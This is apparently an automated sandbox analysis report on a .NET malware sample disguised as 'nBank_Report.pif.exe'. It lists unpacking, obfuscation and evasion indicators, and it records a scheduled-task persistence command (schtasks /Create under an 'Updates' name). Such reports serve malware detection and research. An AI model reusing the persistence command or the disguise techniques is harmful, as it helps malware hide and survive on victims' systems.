              Source: Binary string: System.Core.ni.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbX~ source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: mscorlib.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: \??\C:\Windows\symbols\exe\fLpg.pdbl source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1713708218.0000000000C67000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ?goC:\Users\user\AppData\Roaming\fLpg.pdbdwe source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: @go.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb+ source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdblJ source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1713708218.0000000000C67000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: fLpg.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006190000.00000004.00000020.00020000.00000000.sdmp, nBank_Report.pif.exe, VtPPJdSqnkbmja.exe.0.dr
              Source: Binary string: \??\C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.PDB source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: fLpg.pdbSHA256!t source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006190000.00000004.00000020.00020000.00000000.sdmp, nBank_Report.pif.exe, VtPPJdSqnkbmja.exe.0.dr
              Source: Binary string: \??\C:\Users\user\AppData\Roaming\fLpg.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: System.ni.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WER8EF6.tmp.dmp.17.dr

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: nBank_Report.pif.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: VtPPJdSqnkbmja.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, DK7hrTkkoyOZXoRcfs.cs.Net Code: uxJboX2Gv9 System.Reflection.Assembly.Load(byte[])
              Source: 0.2.nBank_Report.pif.exe.56e0000.5.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
              Source: 0.2.nBank_Report.pif.exe.2ec52d0.0.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
              Source: 0.2.nBank_Report.pif.exe.2ece8e8.1.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
              Source: 10.2.VtPPJdSqnkbmja.exe.2f6e918.0.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
              Source: 10.2.VtPPJdSqnkbmja.exe.2f65300.1.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
              Source: nBank_Report.pif.exeStatic PE information: 0xBE21315F [Fri Jan 30 12:26:07 2071 UTC]
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 0_2_015501A5 push esp; ret 0_2_015501B3
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0679B46B push es; retf 8_2_0679B46C
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0679F1A3 push es; iretd 8_2_0679F1A4
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0679BF37 push es; iretd 8_2_0679BF38
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0679BF83 push es; iretd 8_2_0679BF84
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 13_2_027524B9 push 8BFFFFFFh; retf 13_2_027524BF
              Source: nBank_Report.pif.exeStatic PE information: section name: .text entropy: 7.893344076721277
              Source: VtPPJdSqnkbmja.exe.0.drStatic PE information: section name: .text entropy: 7.893344076721277
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, isKq68gqO0TTd8hR6R.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'yUDlYaqLUO', 'GkTlvCkoSE', 'H0mlz7mIeI', 'MgeR6Q7S5J', 'C0rR93QgV8', 'imXRllZB6V', 'IueRRh65Jy', 'Xeq4UI3LtlSbxr4sLMN'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, zhgHtn77yxMhsCO296.csHigh entropy of concatenated method names: 'Dispose', 'bXt9Ymtc5G', 'N37lncl4TM', 'VGNvv6SFMt', 'hIj9v6XZj8', 'Ok59zcGq4j', 'ProcessDialogKey', 'MEbl6AYhib', 'AtJl9tokCo', 'NfXllGgr45'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, qCCYToT3FpfN5ToDm2.csHigh entropy of concatenated method names: 'r7e1EFY2j5', 'f0R1gvTsr4', 'YRp1BnqBNQ', 'PqiBvpSSSU', 'HQZBzAZ2SO', 'D7J16snIOu', 'i8U19RhAJ0', 'seq1lIYqTQ', 'MHl1ROKO37', 'zX51bb9IMy'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, EGsLUd96Qliv0dCPxXn.csHigh entropy of concatenated method names: 'PYK54XZQUD', 'sQv5PShAXb', 'OW25oJKsbK', 'NT35AZvEou', 'Mju5U8XTUM', 'a075pgXBi8', 'Mhd5MjGJc6', 'WxT5GQcDBa', 'fX4539pi4g', 'Ljo5Qwb6aH'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, qemLKGDHI3lRcUNM10.csHigh entropy of concatenated method names: 'TbGNtM2PyV', 'SBeNs9kBIs', 'Fx9ND4ifJ2', 'IMUNm7EgaY', 'gquNnKHMRB', 'Lb5NeuiIBH', 'sbRNdsvFLX', 'nHiNCJH184', 'Aw4NFUOgFP', 'ebkNTJXghQ'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, LExNE6b6gaUQLYhMuv.csHigh entropy of concatenated method names: 'ukO91Zt8dr', 'B9Q9k6E8i6', 'aXV98c4613', 'Am19uEjFxk', 'm4m9N3m3iD', 'Vyb9Lf7jXw', 'U3hA4MurItlPI0VsOE', 'pkL24CS3fw0WIkGA20', 'LQB99fAqaH', 'Vek9RGGPmO'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, rFxkr0Q2I5Cec84m3m.csHigh entropy of concatenated method names: 'To1SUFeDho', 'do9SMCjHmk', 'EOJgeNsRjL', 'KwBgdhsyNS', 'UQagCpIZEh', 'MhggFVrre6', 'd30gTEnDRy', 'tBCgHKqbZr', 'WSigiA7mPj', 'fvdgtuXUuw'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, Sy0QjyZmDiWM0VpTTV.csHigh entropy of concatenated method names: 'BI6c8pq8QF', 'vTVcuWMsbT', 'ToString', 'BQ6cESeirn', 'aa0c740Cvj', 'gjgcgL88im', 'JrwcSAny1s', 'zALcBebXlu', 'tXfc1iZRp0', 'YF7ckFvIrR'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, hR2F0Ai5HCNgjbVIK2.csHigh entropy of concatenated method names: 'ecM14glfGh', 'NF91PZvOqx', 'MJV1ooVdr4', 'd2V1AxtH1d', 'wBA1UTTMvj', 'yOO1pp3OyU', 'sU61MptPUM', 'am81GRsjdM', 'Eib13jLnpV', 'K7k1QKOVGG'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, MqZBZ63XVc4613Am1E.csHigh entropy of concatenated method names: 'BClgA66gIN', 'T0ngpIsWoh', 'a8XgGjhMLG', 'n0lg34ow4q', 'FDPgN4wJ5D', 'T1TgLBeexO', 'mqRgcCLCkk', 'qnUgjeoHwS', 'gYXg5pyMSS', 'zgEgwnoxBH'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, Dgr45fv7FH9pS6Mhim.csHigh entropy of concatenated method names: 'E2E59E0WGA', 'pey5RHhAFa', 'Vn25b3bbdh', 'aKZ5EW5xmE', 'iQd57Qreym', 'd5F5SGeh15', 'cOU5BeR12F', 'gDNjqp3xbK', 'TTHjIW1qkg', 'O0VjYw4nNO'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, TooKExJr1vOQ2fA9Bp.csHigh entropy of concatenated method names: 'bjlrGsibke', 'tQBr3rSYGC', 'pfUrai36f1', 'X0trn1hqNS', 'ci0rdnS8WO', 'wiPrCrU5Dn', 'Ee8rTaEgiQ', 'boQrH7LJjd', 'BcxrtWheCH', 'oIjrVRDb86'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, uZt8drGU9Q6E8i6tV6.csHigh entropy of concatenated method names: 'rt37Dk6Xh1', 'dPZ7mxbpMI', 'HE47X95pbI', 'GFq7Z5CFVW', 'YyV7xn0a1E', 'vQT7W4apWH', 'q9G7qELExc', 'sE97Iya9Yb', 'IZR7YcqyC5', 'ihb7vNgJuh'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, gMRXXkl5NA8dKJhr7H.csHigh entropy of concatenated method names: 'IIdokWTIu', 'dD9AvNfPL', 'LF8pDMNdB', 'm0WMVyMtV', 'Hg23sU8xx', 'JVGQBfjom', 'TpjSEW0KAwSxlGGj1e', 'Nc1t9OT0RCThjTIdSN', 'eHY32DyxiO5Ueo56MH', 'jivj97uBv'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, EiDqybaf7jXwoyK2yL.csHigh entropy of concatenated method names: 'OQ3BK8b9WR', 'jWiB7KGm8x', 'bpKBSAJ13j', 'yfyB1Hmn2W', 'QB3Bk46f1X', 'dtcSxQbjlS', 'ieGSWi9UZp', 'I3jSqEBOxD', 'Nf1SIeadPy', 'hgySYNoqCZ'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, DF0B8wWqDI75oVZ8Ba.csHigh entropy of concatenated method names: 'ET8cIDkpG3', 'BL2cv3fEnN', 'DQuj60AOey', 'kKAj9Q9Svc', 'vPfcVBROJy', 'kyUcsQn4Wf', 'SJbcJ8VD8c', 'A1fcDF4WXp', 'ctxcm0ViQQ', 'H1pcXOeKpW'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, zWOrJq9RjGGbmW4t8js.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XiHwDHApXd', 'BtewmnJBPk', 'G6pwXmWqj6', 'hCDwZIU7hY', 'Vwqwx78LgM', 'qguwWCYin4', 'WudwqlQZht'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, Xj6XZjI8Vk5cGq4jHE.csHigh entropy of concatenated method names: 'PLOjEYveGC', 'USRj7di7Iy', 'WZujgg2qYC', 'ksnjS6gPWu', 'xhFjB7lEox', 'iYVj1EbpY8', 'w3SjkOhC8U', 'PZdj2DMqbV', 'u0uj8eqy03', 'tiMjuXfWKE'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, dAYhibYAtJtokCotfX.csHigh entropy of concatenated method names: 'LARjaMduts', 'L3xjnVkwDy', 'oSpjegtM84', 'VPcjdEUcYP', 'WZsjDOc9Y0', 'fvJjCWKNk0', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, ee3XGwXC0mSaZSJeMf.csHigh entropy of concatenated method names: 'ToString', 'Xh0LVE2wU8', 'xNZLnwCMga', 'bUsLecPMpA', 'L2xLdO0ccn', 'kJTLCcYY10', 'K2mLF5plYt', 'SP8LTIc8ki', 'hPNLHFG83b', 'rrYLiJfKwm'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, DK7hrTkkoyOZXoRcfs.csHigh entropy of concatenated method names: 'm1SRKgA9qW', 'KbEREOakwI', 'pVxR7CJ3BA', 'FS0RgujAtQ', 'YXeRSRMtbu', 'thwRB9Z994', 'EghR128QxI', 'XELRkSrIql', 'xPhR23qhuk', 'AJXR8NN7sU'
              Source: 0.2.nBank_Report.pif.exe.56e0000.5.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
              Source: 0.2.nBank_Report.pif.exe.2ec52d0.0.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
              Source: 0.2.nBank_Report.pif.exe.2ece8e8.1.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
              Source: 10.2.VtPPJdSqnkbmja.exe.2f6e918.0.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
              Source: 10.2.VtPPJdSqnkbmja.exe.2f65300.1.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeFile created: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp6F97.tmp"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Moves itself to temp directory
              Source: c:\users\user\desktop\nbank_report.pif.exeFile moved: C:\Users\user\AppData\Local\Temp\tmpG806.tmpJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
